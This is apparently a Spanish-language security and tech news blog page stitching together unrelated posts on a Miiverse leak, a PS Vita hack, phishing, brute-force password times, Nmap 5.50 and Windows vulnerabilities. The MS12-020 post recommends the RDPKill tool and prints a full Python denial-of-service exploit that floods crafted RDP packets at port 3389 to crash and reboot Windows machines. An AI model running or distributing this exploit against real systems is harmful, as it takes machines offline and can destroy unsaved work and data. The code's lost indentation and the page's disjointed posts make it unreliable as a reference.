Un modo privado en la aplicación Miiverse de Wii U que no había sido bloqueado por Nintendo ha sido descubierto de forma fortuita por un usuario estadounidense. En dicho modo se podían ver mensajes de desarrolladores y había una lista de juegos que próximamente podrían salir para Wii U. Entre los títulos están Yoshi’s Island Wii U y sendas entregas sin identificar de Metal Gear Solid y Resident Evil.

Este fallo, es explotable, Microsoft ya publicó en marzo el boletín MS12-020 que soluciona los errores en RDP. Lo más grave de esta vulnerabilidad podría permitir la ejecución remota de código si un atacante envía una secuencia de paquetes RDP a un sistema afectado. De forma predeterminada, el protocolo de Escritorio remoto (RDP) no está habilitado en ningún sistema operativo Windows. Los sistemas que no tienen RDP habilitado no están expuestos.
Los riesgos de esta  vulnerabilidad tiene el potencial de causar estragos en las empresas, organizaciones gubernamentales y usuarios individuales, ya que permite a atacantes remotos caminar a la derecha en la red sin necesidad de autenticación, dijo Percoco. Mientras RDP está desactivado por defecto en la mayoría de los sistemas de Windows, los usuarios y administradores de pequeñas y medianas empresas a menudo se enciende para soporte técnico remoto. Muchos se olvidan de apagarlo.

Hemos encontrado una herramienta llamada RDPKill,dicha herramienta explota la vulnerabilidad de escritorio remoto tan solo poniendo en uno de los campos el target o IP objetivo en este caso el IP del escrito remoto al cual quremos atacar y en el otro campo pondremos el puerto remoto y darle clik al boton Kill , el objetivo de esta herramienta acaba causando un BSOD en el equipo remoto, el famoso BSDO la llamada Blue Screen of Death mas conocida como pantalla azul de la muerte,como sabemos existen 2 tipos de pantallas azules de la muerte , la mas perjudicial es la hace que cuando el núcleo del sistema operativo Windows XP no puede recuperarse de un error y la única acción que un usuario puede realizar es reiniciar el sistema perdiendo todo el trabajo no guardado, el estado de todos los programas ejecutándose en ese momento y poniendo en peligro la integridad del sistema de archivos y los archivos mismos creados mediante Windows, en este punto es posible perder toda la información en los discos duros gestionados por Windows y su sistema de archivos NTFS o FAT 16/FAT 32.

La otra forma de  tambien hemos encontrado es ejecutando el exploit de esta vulnerabilidad y ha sido probado en una maquina virtual  en WINXP SP3

El código del exploit:

# ms12-020 smaller
# I reduced the needed payload to DOS, the crashed is caused by buf2
# bp RDPWD!NM_Disconnect // crash is after this
#
# freenode #ms12-020

import socket
import sys
import time

#init
buf0 = “030000130ee000000000000100080000000000″.decode(‘hex’)
#MCS: Connection-initial
buf1 = “030001d602f0807f658201940401010401010101ff3019020400000000020

4000000020204000000000204000000010204000000000204000000010202ffff020

4000000023019020400000001020400000001020400000001020400000001020400

00000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204

000000010204000000000204000000010202ffff0204000000020482013300050014

7c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca0

3aa09040000ce0e000048004f005300540000000000000000000000000000000000

000000000000000004000000000000000c00000000000000000000000000000000

000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000001ca010000000000100007000100300

030003000300030002d003000300030002d0030003000300030003000300030002d

0030003000300030003000000000000000000000000000000000000000000000000

00004c00c000d0000000000000002c00c001b0000000000000003c02c00030000007

26470647200000000008080636c6970726472000000a0c0726470736e6400000000

00c0″.decode(‘hex’)

#payload
buf2 = “0300000802f08028″.decode(‘hex’)

package = buf0+buf1+buf2

HOST = sys.argv[1]
PORT = 3389
for i in range(10000):
print i
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((HOST,PORT))
try:
s.send(package)
rec = s.recv(1024)
except:
pass
s.close()
Al ejecutarlo la máquina Windows remota se reinicia.

¡Logran piratear PS Vita a través de una vulnerabilidad de un juego lanzado en PSP!

El temor de cualquier fabricante de consolas es que se pueda piratear y, por tanto, ejecutar juegos descargados o de terceros. Poco se había oído de este tema con respecto a la consola de Sony, pero ha sido llegar a occidente y aparecer el primer método para piratear PS Vita.

Al final, lo que consigue VHBL es poder ejecutar programas y juegos de otras plataformas como Super Nintendo o MegaDrive. De momento no se sabe si VHBL puede cargar juegos piratas en PS Vita, pero Sony -por lo pronto- ya ha retirado Motorstorm Artic Race de PlayStation Network para parchear y corregir la vulnerabilidad.

Todo parte de una vulnerabilidad encontrada por un hacker en el juego de PSP Motorstorm Artic Race. Dicha vulnerabilidad permite ejecutar software casero en PS Vita a través de un cargador de software para PSP llamado HBL.

El hacker que ha encontrado dicha vulnerabilidad ha creado un port de este cargador para aprovecharse del emulador de juegos de PSP que incluye la nueva consola de Sony y, por tanto, poder cargar dicho hack y los juegos que permite HBL en PSP.

A una semana del día internacional de la mujer, puedo predecir que aumentarán los indices de phishing por esos días. Y es que es algo ya tan usual que en fechas especiales los hackers maliciosos preparen sus herramientas y cartas personalizadas para hacer phishing usando de carnada el tema del día especial.
Una muy buena explicación sobre este tema la podemos ver en el siguiente video que publicaron nuestros amigos de ENHACKE. Espero les guste.

Saludos!

Hace un rato vi en la página de Filesonic que habian publicado un mensaje en su página principal.
Todo parece que estan modificando las funcionalidades ofrecidas originalmente por todos los sucesos que han habido en los ultimos dias.
En otras páginas dicen que es por presión del FBI, así que nos queda esperar ver un comunicado que brinde más información al respecto.

Les dejo una imagen del aviso que tienen publicado en FILESONIC.

Al parecer el problema de conexión no sólo estaría pasando en Perú, sino también en otros países de Latinoamérica como Chile y Argentina.

Desde distintas partes del interior del país, usuarios de internet de la empresa Movistar reportan problemas para navegar por internet tanto por ordenadores como por smartphones.

Es muy probable que, aunque seamos seguidores de todo lo que hace la empresa de Cupertino, también nos haya llamado la atención un proyecto de sistema operativo en ciernes que está auspiciando Google desde hace unos años, se trata de Chrome OS, un sistema operativo de escritorio algo diferente al resto pues se basa íntegramente en la red utilizando todos los servicios que la empresa del buscador posee.

Si bien Google ha establecido ciertos acuerdos con fabricantes de portátiles para que ofrezcan equipos adaptados para ser usados con Chrome OS, a los que han dado en llamar Chromebooks (qué causalidad), estos equipos parecen pequeños netbooks bastante limitados y con poca capacidad. Es por eso que un conocido hacker conocido como Hexxeh ha intentado instalar y ejecutar la versión de desarrollo de Chrome OS, llamada Chromium OS, en un MacBook Air de 11 pulgadas de la última generación con excelentes resultados.

El proceso ha sido realizado utilizando Boot Camp y sobreescribiendo OS X de modo que es recomendable hacer una copia de seguridad de nuestro equipo si quisiéramos emular a este individuo en su hazaña. Al finalizar todo el proceso, detallado en su página web, el resultado es un ChromeBook de Apple totalmente funcional salvo en tres aspectos:

• El Bluetooth no funciona, porque esta tecnología no tiene soporte aún en el desarrollo de Google.
• El arranque es algo más lento de lo habitual, hasta 22 segundos.
• El scroll del touchpad funciona algo más lento de lo habitual.

Por lo demás, como os decíamos, tendremos todas las “ventajas” de Chrome OS en un MacBook Air. Aunque en lo personal, no le veo ningún beneficio a este hack, tan solo la satisfacción de la curiosidad o el orgullo de haber conseguido una hazaña digital. Como decíamos al principio, todas las posibilidades con Chrome OS se circunscriben a las funciones que otorgan los servicios de Google, y hay mucha vida más allá de estos. ¿No es mejor esperar a Lion y disfrutarlo?.

Navegando por la red encontré esta imagen que puede servirnos de referencia a la hora de hacer calculos para obtener tiempos de exito en ataques de fuerza bruta.

Supongo estos datos son aproximados ya que con el aumento de la capacidad y poder de procesamiento en aumento, obviamente los tiempos se reducen.
Un factor que también hay que tomar en cuenta, es que para esta tabla, se están presentando los tiempos para ataques de fuerza bruta, es decir, intentos de autenticación en los que se van probando, en forma permutada, miles de secuencias de caracteres posibles hasta obtener una respuesta afirmativa de la máquina o servicio objetivo.

Estos tiempos supongo no se aplican si la palabra puede ser obtenida por ataques de diccionario. Por ejemplo si mi contraseña es CONTRASEÑA, según la tabla debería tomarse más de 4 meses descrifrandola, ya que tiene mas de 9 caracteres. El punto debil en esta contraseña es que es una palabra facilmente obtenible por medio de un ataque de diccionario, en donde el atacante probará miles de palabras que tiene definidas en un archivo (llamado diccionario) y de las cuales se espera que alguna de estas palabras sea la contraseña de la victima.

En el último caso (ataque por diccionario) no servirá de nada que nuestra palabra clave tenga mas de 9 caracteres. Si es una palabra de diccionario, las probabilidades de obtener la contraseña serán altas.

Así que piensenlo un par de veces antes de elegir su proxima contraseña.
Saludos!

Amigos! les escribo emocionado porque chekeando por ahi, he visto que ya se lanzó la nueva versíon de NMAP (v. 5.50).

Les colocaré en español parte de la carta que envía Fyodor, creador de NMAP, a la lista de noticias de usuarios NMAP.

“Hola amigos! Ha pasado un año desde la ultima versión estable de Nmap (v. 5.21) y seis meses desde la versión de desarrollo v. 5.35DC1, por lo que estoy muy contento al lanzar la versión 5.50! Estoy seguro que llegarán a la conclusión de que valió la pena la espera!!!

En esta versión hemos puesto enfasis en el NSE – Nmap Scripting Engine, que le ha permitido a Nmap expandir su potencial y expanderse en cuanto a sus funcionalidades con protocolos, llevando al descubrimiento y reconocimiento de red a un nuevo nivel.

Desde la última versión (v. 5.21) hemos duplicado el numero de scripts NSE a 177 y las librerias NSE han aumentado de 30 a 54.

Excelente verdad??? Si les interesa esta gran herramienta diseñada para facilitar nuestra fase de reconocimiento, escaneo y enumeracion, pueden averiguar mas en su página oficial:  http://nmap.org/

Saludos!!

En el departamento de seguridad de Microsoft deben estar trabajando a contrarreloj. Ayer (07-01-2010) se confirmaba una vulnerabilidad en el intérprete de gráficos que permite a un atacante ejecutar código a través de un thumbnail convenientemente modificado. La vulnerabilidad afecta a todos los Windows salvo 7 y Server 2008, y ya existe un exploit público.

Y no es la única. Durante los meses anteriores se han descubierto otras cuatro vulnerabilidades graves con exploit público: un fallo en el motor CSS de Internet Explorer 8 que permite ejecución de código, otros dos en el programa de Fax de Windows y una librería DLL que también permiten la ejecución de código, y una vulnerabilidad de escalada de privilegios en el kernel.

Además, podría unirse otra vulnerabilidad a la lista dentro de poco. Un hacker llamado Michal Zalewski está investigando una vulnerabilidad en Internet Explorer 8 que podría permitir la ejecución de código.

Ante estas vulnerabilidades la protección es la misma de siempre: tener cuidado con lo que se descarga y un antivirus y firewall actualizados. Aunque se espera que Microsoft saque un boletín de seguridad el 11 de enero, no es seguro que salgan parches para estas vulnerabilidades.